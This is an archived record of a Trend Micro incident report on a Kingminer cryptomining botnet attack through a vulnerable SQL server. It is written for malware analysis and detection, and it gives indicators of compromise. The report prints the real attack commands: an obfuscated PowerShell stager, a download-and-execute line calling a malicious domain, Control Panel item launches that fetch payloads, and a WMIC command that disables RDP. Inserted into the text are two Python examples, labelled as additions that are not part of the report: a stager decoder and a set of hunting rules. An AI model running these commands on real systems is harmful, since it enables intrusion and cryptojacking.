{
	"id": "cbc2d23a-46fc-49e2-b8f8-8f328b7bdb89",
	"created_at": "2026-04-06T00:12:05.785916Z",
	"updated_at": "2026-04-10T03:22:13.08286Z",
	"deleted_at": null,
	"sha1_hash": "98475c80a5b362f192aa20d95a91ae36f7e5b1c6",
	"title": "Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 612463,
	"plain_text": "Uncovering a Kingminer Botnet Attack Using Trend Micro Managed\r\nXDR\r\nBy By: Buddy Tancio, Jed Valderama May 18, 2022 Read time: 4 min (1088 words)\r\nPublished: 2022-05-18 · Archived: 2026-04-02 10:46:20 UTC\r\nTrend Micro’s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our\r\nfindings and analysis in this report.\r\nWe observed malicious activities in a client’s SQL server that flagged a potential exploit in one public-facing device. A\r\nquick look at the Trend Micro Vision One™ Workbench showed that a Microsoft SQL server process created an obfuscated\r\nPowerShellnews- cybercrime-and-digital-threats command. This suggested that the machine had been compromised,\r\nprompting us to investigate further.\r\nThe tactics, techniques, and procedures (TTPs) discussed here reflect many of the TTPs that threat researchers have\r\nidentified with the Kingminer botnet. According to reportsopen on a new tab in mid-2020, malicious actors deployed\r\nKingminer to target SQL servers for cryptocurrency mining. Threat analysts have also documented known activitiesopen on\r\na new tab of the Kingminer botnet operators in November 2018 and their reemergenceopen on a new tab in July 2019. Our\r\nrecent detections therefore suggest the apparent resurgence of the malware that exploits systems with known, unpatched\r\nvulnerabilities. We discuss our findings in the following section.\r\nFigure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity\r\nInvestigation and analysis\r\nWe observed a VBScriptopen on a new tab file named %PUBLIC%\\gfghhjhyuq.vbs executed through sqlservr.exeopen on a\r\nnew tab. This led us to suspect that the device had been exploited through a vulnerability that allowed malicious actors to\r\nexecute arbitrary codes remotely. 
The sqlservr.exe process handles the requests received by an MSSQL database.\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 1 of 5\n\nFigure 2. Trend Micro Vision One™ execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs\r\nWe collected the gfghhjhyuq.vbs file through Trend Micro Vision One to probe further. Although the script was obfuscated, we were able to uncover most of its functions by decoding its hex-string parameters. We describe the chain of events in the following section.\r\nThe file first checks the operating system version through a WMI object. It then downloads a 32-bit or 64-bit payload, depending on the installed Windows version.\r\nFigure 3. Partially decoded gfghhjhyuq.vbs checking the operating system version through a WMI object\r\nNext, it downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository, then saves and executes it as %PUBLIC%\\{timestamp}\\sysdo.exe.\r\nFigure 4. Downloading of the 32-bit or 64-bit PowerShell binary from a GitHub repository\r\nFigure 5. PowerShell binary copied as sysdo.exe and executed\r\nFollowing this, it generates the URL from which additional PowerShell scripts are downloaded. The scripts are then executed filelessly using Invoke-Expression.\r\nFigure 6. Generating URLs for download and fileless execution of additional PowerShell scripts\r\nFinally, it runs a cryptocurrency miner payload through a Control Panel item.\r\nFigure 7. Execution of the cryptocurrency miner through a Control Panel item\r\nSecurity teams can clearly see and monitor the chain of events in Vision One. 
After the cryptocurrency miner is executed through the Control Panel item, sqlservr.exe calls C:\\Windows\\Temp\\sysdo.exe (the renamed PowerShell binary).\r\nFigure 8. Sysdo.exe (the renamed PowerShell binary) executing the following obfuscated command directly in memory, detected as Trojan.PS1.MALXMR.PFAIS\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$p='b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafba5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8\r\n= for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse($p.substring($i,2),'HexNumber')) -bxor 151)};$p=(-join $p) -join ' ';$p|\u0026(GAL I*X)\"\r\nUpon checking the Windows Antimalware Scan Interface (AMSI) telemetry through Vision One, we saw the decoded PowerShell command lines. These connect to hxxp://ww[.]3113cfdae[.]com/eb[.]txt:\r\n$o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open('GET','http://ww.3113cfdae.com/eb.txt',$False);$o.Send();$p=$o.responseText;[System.Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($p))|\u0026(GAL I*X);nei -PEPath ffff -nic tk\r\nSimilar to what we saw in our analysis of the gfghhjhyuq.vbs script, we also observed through Vision One that sysdo.exe invoked rundll32 with main.cpl, the built-in Control Panel module for mouse settings. 
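The Python below is an added example, not code from the Trend Micro report. It re-implements the decode step that the Figure 8 command performs on itself (pairs of hex digits parsed as bytes, each XORed with 151), so the stager can be recovered offline from a captured command line instead of being run. The hex blob is the one printed in Figure 8; the report truncates it, so only the first 64 bytes decode, and they match the start of the AMSI-visible command above. GAL I*X is Get-Alias with a wildcard that resolves to iex, Invoke-Expression, which is what the trailing pipe feeds. The decode_command helper, its regexes and the rebuilt FIGURE8_CMDLINE sample are assumptions added here.

```python
# Added example (not from the Trend Micro report): recover the plaintext of the
# hex/XOR PowerShell stager shown in Figure 8 from a captured command line.
import re
from typing import Optional

Q = chr(39)  # ASCII single quote, used to build the sample command line

# Hex payload exactly as printed in Figure 8. The report truncates it, so only the
# first 64 bytes of the real stager are recoverable.
PAGE_HEX_PREFIX = (
    'b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafb'
    'a5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8'
)

# Constructed sample: the Figure 8 command line rebuilt around that hex blob
# (assumption: this is the shape an EDR would capture, not a verbatim copy).
FIGURE8_CMDLINE = (
    'powershell.exe -c $p=' + Q + PAGE_HEX_PREFIX + Q
    + ';$p= for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse('
    + '$p.substring($i,2),' + Q + 'HexNumber' + Q + ')) -bxor 151)};'
    + '$p=(-join $p) -join ' + Q + ' ' + Q + ';$p|&(GAL I*X)'
)

HEX_RUN = re.compile('[0-9a-fA-F]{16,}')  # candidate payload blobs
XOR_KEY = re.compile('-bxor[ ]+(0x[0-9a-fA-F]+|[0-9]+)', re.IGNORECASE)  # key the loop uses


def xor_hex_decode(hex_blob: str, key: int) -> str:
    # Same work as the malicious loop: two hex digits -> one byte -> XOR key -> char.
    if len(hex_blob) % 2:
        hex_blob = hex_blob[:-1]  # a truncated dump may end on half a byte; drop it
    raw = bytes(b ^ (key & 0xFF) for b in bytes.fromhex(hex_blob))
    return raw.decode('latin-1')  # one char per byte, nothing is lost or guessed


def decode_command(cmdline: str) -> Optional[str]:
    # Pull the longest hex run and the -bxor key out of a captured command line.
    # Returns None when the line does not carry this stager pattern.
    blobs = HEX_RUN.findall(cmdline)
    key_match = XOR_KEY.search(cmdline)
    if not blobs or not key_match:
        return None
    key = int(key_match.group(1), 0)  # base 0 accepts both 151 and 0x97
    return xor_hex_decode(max(blobs, key=len), key)


if __name__ == '__main__':
    print(decode_command(FIGURE8_CMDLINE))
```

Running the block prints the recovered prefix, $o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open('GET','http://, which is exactly where the AMSI telemetry picks the story up. The decoder deliberately reads the key from the command itself rather than guessing it, because with a printable-ASCII plaintext several keys produce plausible output and only the one the loop carries is authoritative.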
The malicious actor used main.cpl to launch the payload directly in the device’s memory; the payload connects to the known malicious domain hxxp://qqqe[.]1eaba4fdae[.]com to download additional components.\r\n\"C:\\Windows\\System32\\control.exe\" \"C:\\Windows\\system32\\main.cpl\" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99\r\n\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\system32\\main.cpl\" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99\r\nFigure 9. Process tree of Control Panel item execution as seen in the Vision One console\r\nWe noticed additional command-line executions spawned by sqlservr.exe, issued by the previously dropped sysdo.exe. Each command line chains two checks: the first tests whether the installed Windows version string is 5.0 through 6.1 (Windows 2000 through Windows 7), and the second tests whether hotfix KB4499175 (Windows 7 SP1) or KB4500331 (Windows XP, Windows Server 2003 SP2) is installed. A legacy system without either hotfix is vulnerable to BlueKeep, CVE-2019-0708. Because cmd.exe runs the command after || whenever the preceding chain failed, the final command fires when the version check fails or when neither hotfix is found: it then disables RDP through WMI (SetAllowTSConnections 0), and the cryptocurrency miner proceeds with its infection routine.\r\n\"C:\\Windows\\system32\\cmd.exe\" /c cmd /c ver |findstr \"5.0 5.1 5.2 6.0 6.1\"\u0026\u0026wmic qfe GET hotfixid |findstr /i \"kb4499175 kb4500331\"||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0\r\n\"C:\\Windows\\System32\\cmd.exe\" /c ver |findstr \"5.0 5.1 5.2 6.0 6.1\"\u0026\u0026wmic qfe GET hotfixid |findstr /i \"kb4499175 kb4500331\"||wmic RDTOGGLE WHERE ServerName='HELPDESK' call SetAllowTSConnections 0\r\nDiscovering vulnerabilities\r\nUsing search engines for internet-exposed devices such as Shodan and Censys, the team was able both to see exposed services such as RDP and SQL and to validate missing patches on the affected machine. 
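Pulling the endpoint telemetry above together, the Python below is an added example, not part of the report and not Vision One logic, that turns the observed chain into hunting rules over normalized process-creation events: sqlservr.exe spawning a script host, a Control Panel item launched with a URL argument (seen on control.exe and again on its rundll32 relaunch), the hex/XOR in-memory stager, and the WMIC call that disables RDP after the hotfix probe. The event records and their field names are constructed; the command lines are simplified copies of those shown above (quotes and full paths dropped, hex blob shortened), and sysdo.exe as the parent of control.exe is inferred from the narrative rather than read from the figure. wscript.exe and cscript.exe in the watch list generalize the VBScript execution in this case and were not observed in the report.

```python
# Added example (not from the report or from Vision One): hunting rules for the
# process chain described above, run over constructed, normalized process events.
import re
from typing import Dict, List, Tuple

# Child images a database engine should not be launching. wscript/cscript are an
# added generalization (the usual hosts for a .vbs), not something the report observed.
SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
                'cscript.exe', 'mshta.exe', 'rundll32.exe', 'control.exe'}
HEX_RUN = re.compile('[0-9a-f]{32,}')  # long hex blob as in the Figure 8 stager
URL = re.compile('https?://')

# Constructed events (field names are assumptions). Command lines are simplified
# copies of those shown in the report: quotes and full paths dropped, hex shortened.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {'host': 'HELPDESK', 'parent': 'sqlservr.exe', 'image': 'powershell.exe',
     'cmdline': '-c $p=b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafb'
                ' ... -bxor 151 ... $p|&(GAL I*X)'},
    {'host': 'HELPDESK', 'parent': 'sysdo.exe', 'image': 'control.exe',
     'cmdline': 'main.cpl -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99'},
    {'host': 'HELPDESK', 'parent': 'control.exe', 'image': 'rundll32.exe',
     'cmdline': 'Shell32.dll,Control_RunDLL main.cpl -QmDvMERT99 '
                'http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99'},
    {'host': 'HELPDESK', 'parent': 'sqlservr.exe', 'image': 'cmd.exe',
     'cmdline': '/c ver |findstr 5.0 5.1 5.2 6.0 6.1 && wmic qfe GET hotfixid '
                '|findstr /i kb4499175 kb4500331 || wmic RDTOGGLE WHERE '
                'ServerName=HELPDESK call SetAllowTSConnections 0'},
    # Benign control: a SQL Agent job step runs under sqlagent.exe, not sqlservr.exe.
    {'host': 'HELPDESK', 'parent': 'sqlagent.exe', 'image': 'cmd.exe',
     'cmdline': '/c echo nightly maintenance step complete'},
]


def classify(ev: Dict[str, str]) -> List[str]:
    # Return every technique tag the event matches; an empty list means nothing fired.
    parent, image, cmd = ev['parent'].lower(), ev['image'].lower(), ev['cmdline'].lower()
    tags: List[str] = []
    if parent == 'sqlservr.exe' and image in SCRIPT_HOSTS:
        tags.append('sqlservr_spawns_script_host')
    if image in ('control.exe', 'rundll32.exe') and '.cpl' in cmd and URL.search(cmd):
        # control.exe relaunches the item as rundll32 shell32.dll,control_rundll <cpl> <args>,
        # so the URL argument shows up on both processes and both are caught here.
        tags.append('cpl_item_with_url_argument')
    if '-bxor' in cmd and HEX_RUN.search(cmd):
        tags.append('hex_xor_inline_script')
    if 'rdtoggle' in cmd and 'setallowtsconnections 0' in cmd:
        tags.append('rdp_disabled_via_wmic')
    if 'qfe' in cmd and ('kb4499175' in cmd or 'kb4500331' in cmd):
        tags.append('bluekeep_hotfix_probe')
    return tags


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    # Keep only events that fired at least one rule, together with the tags that fired.
    hits = []
    for ev in events:
        tags = classify(ev)
        if tags:
            hits.append((ev['host'], ev['image'], tags))
    return hits


if __name__ == '__main__':
    for host, image, tags in triage(SAMPLE_EVENTS):
        print(host, image, ', '.join(tags))
```

Four of the five constructed events fire; the SQL Agent step does not, because its parent is sqlagent.exe. On servers where xp_cmdshell is legitimately enabled its children also appear under sqlservr.exe, so the first rule needs baselining against known jobs before it is alerted on; the Control Panel, hex/XOR and RDTOGGLE rules are specific enough to page on directly.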
One of the vulnerabilities we found through these scans traces back to 2014.\r\nFigure 10. Vulnerability found through a Shodan scan of the public-facing machine\r\nNotably, after we detected gfghhjhyuq.vbs (detected as Trojan.VBS.MALXMR.AS), we continued to observe further attempts to drop malware on the same server. Although the malicious actor was unable to execute the malware, the attempts did not stop while the vulnerability remained; only after it was patched did they cease.\r\nConclusion and security recommendations\r\nWhile signature-based detection measures are in place to shield an organization’s network from breaches, security teams should still prioritize identifying vulnerabilities on their servers and endpoints and make sure these are patched immediately. Doing so is even more crucial for public-facing systems. Adopting a proactive cybersecurity mindset is essential for an organization to thrive as the conduct of business in the digital space deepens and grows.\r\nWe recommend that organizations deploy intrusion detection systems such as Trend Micro™ Deep Discovery™ Inspector as a preventive measure. This is relevant to the case discussed here: because we did not have network-level visibility, we relied solely on endpoint-level data to investigate and respond to the threat. Network monitoring allows security professionals to detect specific server-related vulnerabilities that malicious actors might abuse, and to scope out all affected machines on the network. 
A reliable intrusion detection system is also a useful tool for monitoring and investigating ongoing attacks, since it provides historical logs of activity on an organization’s network.\r\nIndicators of compromise (IOCs)\r\nSHA256 Detection Name\r\n0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0 Trojan.VBS.MALXMR.AS\r\nCB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86 Trojan.PS1.MALXMR.PFAIS\r\nhxxp://ww[.]3113cfdae[.]com/eb[.]txt, detected as Dangerous (Disease Vector)\r\nhxxp://qqqe[.]1eaba4fdae[.]com/, detected as Dangerous (Disease Vector)\r\nSource: https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
	],
	"report_names": [
		"uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434325,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.pdf",
		"text": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.txt",
		"img": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.jpg"
	}
}